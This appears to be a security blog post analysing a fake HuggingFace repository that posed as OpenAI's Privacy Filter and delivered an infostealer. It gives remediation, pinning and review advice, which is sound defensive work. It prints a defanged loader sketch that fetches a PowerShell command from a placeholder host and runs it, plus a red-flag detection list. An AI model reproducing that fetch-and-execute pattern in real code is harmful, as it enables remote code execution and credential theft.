A malicious repository impersonating OpenAI’s Privacy Filter model quietly climbed HuggingFace’s trending list, accumulating roughly 244,000 downloads before anyone realized it was distributing an infostealer.
This is not a one-off curiosity. It’s a clear demonstration that AI model hubs now sit squarely in the same supply chain risk category as npm, PyPI, and other public code registries.
What happened
An attacker published a HuggingFace repository named Open-OSS/privacy-filter, closely typosquatting OpenAI’s legitimate Privacy Filter project. The model card text was copied almost verbatim, giving the repository instant credibility to anyone skimming the page or trusting the brand association.
The malicious payload lived in a file called `loader.py`. At a quick glance, it contained enough AI-adjacent boilerplate to look like a normal model loader. Under the surface, it did three critical things:
- Disabled SSL verification – removing a key integrity and confidentiality control for network traffic.
- Decoded a base64-encoded URL – hiding the true destination of the next-stage payload.
- Fetched a JSON payload containing a PowerShell command – which was then executed in memory, avoiding obvious on-disk artifacts.
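For defenders, this pattern is worth recognizing on sight. The following is a defanged, hypothetical reconstruction of the technique, not the actual malware; the URL, the JSON key, and the function name are placeholders:

```python
# Defanged, hypothetical reconstruction of the loader pattern -- NOT the
# actual malware. It illustrates the three red flags described above.
import base64
import json
import subprocess

import requests

def load_model_weights():  # posed as an ordinary model-loading helper
    session = requests.Session()
    session.verify = False  # red flag 1: SSL verification disabled

    # Red flag 2: the true destination is hidden behind base64 so it never
    # appears as a readable URL in the source.
    encoded = "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcGF5bG9hZA=="  # placeholder
    url = base64.b64decode(encoded).decode()

    # Red flag 3: a JSON response carries a PowerShell command that is run
    # in memory, leaving few on-disk artifacts.
    payload = json.loads(session.get(url).text)
    subprocess.run(["powershell", "-Command", payload["cmd"]])
```

None of these steps has any business in a model loader, which is what makes them reliable review signals.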
The final stage was a Rust-based infostealer. Once executed, it targeted:
- Chromium and Gecko-based browsers: cookies, saved passwords, encryption keys, browsing history, and active session tokens.
- Cryptocurrency wallets: wallet data and seed phrases.
- Browser-accessible credential stores: any credentials that the browser could reach.
If you pulled code or files from this repository onto a machine, the only defensible response is to treat that host as fully compromised.
Why this worked
HuggingFace’s trust model, like many community platforms, leans heavily on reputation and engagement signals:
- Familiar project names and namespaces
- Download counts
- Stars, likes, and trending status
By cloning OpenAI’s Privacy Filter model card and using a near-identical repository name, the attacker piggybacked on OpenAI’s brand trust. Once the repository began to receive downloads—whether from search results, scripts, or direct links—the platform’s trending algorithm amplified it further.
This is the same pattern we’ve seen for years in:
- npm: typosquatted package names and malicious post-install scripts
- PyPI: lookalike libraries with credential stealers or cryptominers
- GitHub Actions: workflows pulling unvetted actions by name or tag
No zero-day was required. The attacker combined:
- A convincing clone of a well-known project’s presentation
- Boilerplate code that passes a superficial review
- Patience while the download counter climbed high enough to look “trusted”
HuggingFace has now joined the list of critical software supply chain surfaces.
What HiddenLayer found
HiddenLayer researchers identified and reported the campaign on May 7, roughly two days after the repository started accumulating significant downloads. Their findings align with a broader trend: by their estimate, 35% of AI-related breaches in 2025 originated from malware in public repositories.
Key points from their analysis:
- The original OpenAI Privacy Filter is a legitimate model.
- The malicious repository copied the model card text nearly verbatim, making it visually indistinguishable to most users.
- Without checksum or cryptographic signature verification, there was no easy way for a casual user to spot that they were pulling from an attacker-controlled repo instead of the real one.
This is exactly why integrity verification and provenance controls are becoming mandatory for AI infrastructure.
Immediate actions if you might be affected
If you downloaded or executed anything from the fake Open-OSS/privacy-filter repository, you should assume compromise. Recommended steps:
- Reimage the machine
  - Perform a full OS reinstall or restore from a known-good, pre-incident image.
  - Do not rely solely on cleaning tools; treat the host as untrusted until rebuilt.
- Rotate all credentials
  - Change passwords for:
    - Email accounts
    - Developer platforms (GitHub, GitLab, HuggingFace, etc.)
    - Cloud providers (AWS, GCP, Azure, etc.)
    - Internal corporate services (VPN, SSO, admin portals)
  - Revoke and reissue API keys, tokens, and SSH keys used from that machine.
- Replace cryptocurrency wallets
  - Generate new wallets and seed phrases.
  - Move funds from any potentially exposed wallets to newly created ones.
- Invalidate browser sessions
  - Log out of all major services from all devices.
  - Use account security pages (Google, Microsoft, GitHub, etc.) to revoke active sessions and tokens.
- Monitor for suspicious activity
  - Watch for:
    - Unrecognized logins or devices
    - Unexpected MFA prompts
    - New SSH keys or OAuth apps added to accounts
What to do now if you use HuggingFace in pipelines
Even if you were not directly impacted, this incident is a warning shot. If your team consumes models from HuggingFace, treat it like any other third-party code registry.
1. Pin by immutable identifiers
Do not rely solely on repository names or tags.
- Pin models by commit hash or SHA256 checksum of the artifacts.
- Maintain an internal registry of approved model digests.
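As a minimal sketch of what pinning can look like with the `huggingface_hub` library; the repo ID and commit hash here are placeholders, not real values:

```python
# Minimal sketch: pin a model download to an exact commit rather than a
# mutable repo name or tag. repo_id and revision below are placeholders.
from huggingface_hub import snapshot_download

local_path = snapshot_download(
    repo_id="your-org/approved-model",  # hypothetical, vetted repository
    revision="6f4e1c0d9b2a7e8f3c5d1a0b4e6f8c9d0a1b2c3d",  # full commit SHA
)
print(f"Pinned model files at: {local_path}")
```

Pinning to a full commit SHA means a renamed, replaced, or force-pushed repository cannot silently change what you download.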
2. Treat loaders and scripts as untrusted code
Any of the following should be considered high-risk and manually reviewed before execution:
- `loader.py`
- `setup.py`
- `install.sh` or other shell scripts
- Custom `inference.py` or wrapper scripts
Look specifically for:
- Network calls to unexpected domains
- Disabled SSL/TLS verification
- Base64 or other obfuscated strings
- Shell, PowerShell, or `subprocess` execution
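This review can be partially automated. Below is a minimal sketch that greps a downloaded repository for the red flags above before anything runs; the pattern list and the path are illustrative, not exhaustive:

```python
# Minimal sketch: scan downloaded model scripts for red-flag patterns
# before executing anything. The pattern list is illustrative only.
import re
from pathlib import Path

RED_FLAGS = [
    r"verify\s*=\s*False",       # disabled SSL/TLS verification
    r"base64\.b64decode",        # obfuscated strings or URLs
    r"subprocess\.",             # shell execution from Python
    r"powershell",               # Windows command execution
    r"requests\.(get|post)",     # outbound network calls
]

def scan(repo_dir: str) -> None:
    scripts = (*Path(repo_dir).rglob("*.py"), *Path(repo_dir).rglob("*.sh"))
    for script in scripts:
        text = script.read_text(errors="ignore")
        for pattern in RED_FLAGS:
            for match in re.finditer(pattern, text, re.IGNORECASE):
                line = text[: match.start()].count("\n") + 1
                print(f"{script}:{line}: matches {pattern!r}")

scan("./downloaded-model")  # placeholder path to the unpacked repo
```

A hit is not proof of malice, but any match should trigger a manual review before the file executes.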
3. Lock down your Python and runtime environments
- Use virtual environments or containers for model experimentation.
- Maintain a whitelist of allowed packages and sources.
- Periodically audit installed packages and dependencies for anything that:
  - Originates from a repository you don’t recognize
  - Was added during the May 7–9 window (for this incident specifically)
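To make that audit repeatable, you can diff installed distributions against your approved set. A minimal sketch; `allowlist.txt` (one package name per line) is a hypothetical file you would maintain internally:

```python
# Minimal sketch: report installed packages missing from an internal
# allowlist. "allowlist.txt" is a hypothetical file, one name per line.
from importlib import metadata
from pathlib import Path

allowed = {
    line.strip().lower()
    for line in Path("allowlist.txt").read_text().splitlines()
    if line.strip()
}
installed = {dist.metadata["Name"].lower() for dist in metadata.distributions()}

for name in sorted(installed - allowed):
    print(f"Not on the allowlist: {name}")
```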
4. Monitor browser and credential stores
If you downloaded models or code from HuggingFace during May 7–9, and especially if you executed any loaders or scripts:
- Check browser credential stores for:
  - Unexpected saved passwords
  - New or suspicious extensions
- Review account security logs for unusual logins or token usage.
The bigger picture: AI model supply chain security
The HuggingFace incident underscores a broader shift: AI models are now part of your software supply chain. That means they deserve the same controls you already apply to open-source libraries and containers.
Key practices to adopt:
- Provenance and signing
  - Prefer models with verifiable signatures or checksums published by trusted maintainers (see the checksum sketch after this list).
  - Push vendors and platforms to support end-to-end signed artifacts.
- Internal model registries
  - Mirror and vet external models into an internal registry.
  - Only allow production systems to pull from this curated source, not directly from public hubs.
- Policy and governance
  - Define clear rules for:
    - Who can introduce new external models
    - What review is required (security, legal, compliance)
    - How updates and deprecations are handled
- Continuous monitoring
  - Integrate model downloads and loader execution into your existing security monitoring.
  - Alert on unexpected outbound connections from inference or training nodes (a minimal example also follows this list).
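On the provenance point: even before end-to-end signing is widely supported, you can verify a SHA256 digest published by a trusted maintainer before loading anything. A minimal sketch; the digest and filename are placeholders:

```python
# Minimal sketch: verify a downloaded artifact against a SHA256 digest
# published by a trusted maintainer. Digest and filename are placeholders.
import hashlib
from pathlib import Path

EXPECTED_SHA256 = "0" * 64  # placeholder: replace with the published digest

def verify(path: str) -> None:
    digest = hashlib.sha256(Path(path).read_bytes()).hexdigest()
    if digest != EXPECTED_SHA256:
        raise RuntimeError(f"Checksum mismatch for {path}: got {digest}")
    print(f"{path}: checksum OK")

verify("model.safetensors")  # placeholder artifact name
```

And on the monitoring point, here is a hedged, node-level sketch using psutil; the allowlist of expected remote addresses is a hypothetical stand-in for your real egress policy:

```python
# Minimal sketch: flag established outbound connections to addresses not
# on an expected list. EXPECTED_REMOTES is a hypothetical allowlist.
# Requires the psutil package; may need elevated privileges on some OSes.
import psutil

EXPECTED_REMOTES = {"10.0.0.5", "10.0.0.6"}  # e.g., internal mirror/registry IPs

for conn in psutil.net_connections(kind="inet"):
    if conn.status == psutil.CONN_ESTABLISHED and conn.raddr:
        if conn.raddr.ip not in EXPECTED_REMOTES:
            print(
                f"Unexpected outbound connection: PID {conn.pid or '?'} "
                f"-> {conn.raddr.ip}:{conn.raddr.port}"
            )
```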
The attack surface around AI infrastructure will not shrink. As more organizations standardize on HuggingFace and similar platforms, adversaries will continue to invest in model-level and repository-level attacks.
If you’re responsible for AI infrastructure, now is the time to fold model supply chain controls into your broader security program—before the next “trending” model quietly becomes your next breach.
Gigia Tsiklauri is a Security Architect and founder of Infosec.ge. Get in touch if you work in AI infrastructure security or want to discuss model supply chain controls.